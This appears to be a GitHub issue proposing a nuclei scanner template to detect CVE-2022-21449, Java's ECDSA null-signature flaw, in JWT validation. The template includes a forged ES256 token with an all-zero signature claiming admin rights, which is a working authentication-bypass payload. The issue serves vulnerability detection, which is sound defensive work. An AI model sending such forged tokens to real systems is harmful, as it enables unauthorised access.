### ISSUE TITLE
Template for CVE-2022-21449 - Round 2

### ISSUE THREAD

**Issue by righettod** [projectdiscovery/nuclei-templates#4232]
### Template Information:

In reference with initial proposal #4216 - I refactored the template to try to decrease the probability of false-positive.

I tested with the last version of nuclei against a vulnerable application and non vulnerable ones:

![image](https://user-images.githubusercontent.com/1573775/164988060-85a35e3b-b621-4b00-84bb-dd1c047b076b.png)

Details for the exchange with the vulnerable application:

![image](https://user-images.githubusercontent.com/1573775/164988240-8a74ea2c-3812-4301-a181-530e54480855.png)

### Nuclei Template:

```yaml
id: CVE-2022-21449

info:
  name: CVE-2022-21449 test exposure
  description: The JDK 15-18 have a vulnerability in validation of ECDSA signature so this template detect exposure to CVE-2022-21449 by the JWT validation API in place.
  author: righettod
  severity: info
  tags: cve,2022,java
  reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java

requests:
  - raw:
      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-store

      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
        Cache-Control: no-store
        

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200'
```

### References:

* https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449
* https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/jwt-null-signature-vulnerable-app
* https://token.dev/
* https://github.com/ticarpi/jwt_tool/issues/65
* https://github.com/projectdiscovery/nuclei-templates/issues/4216
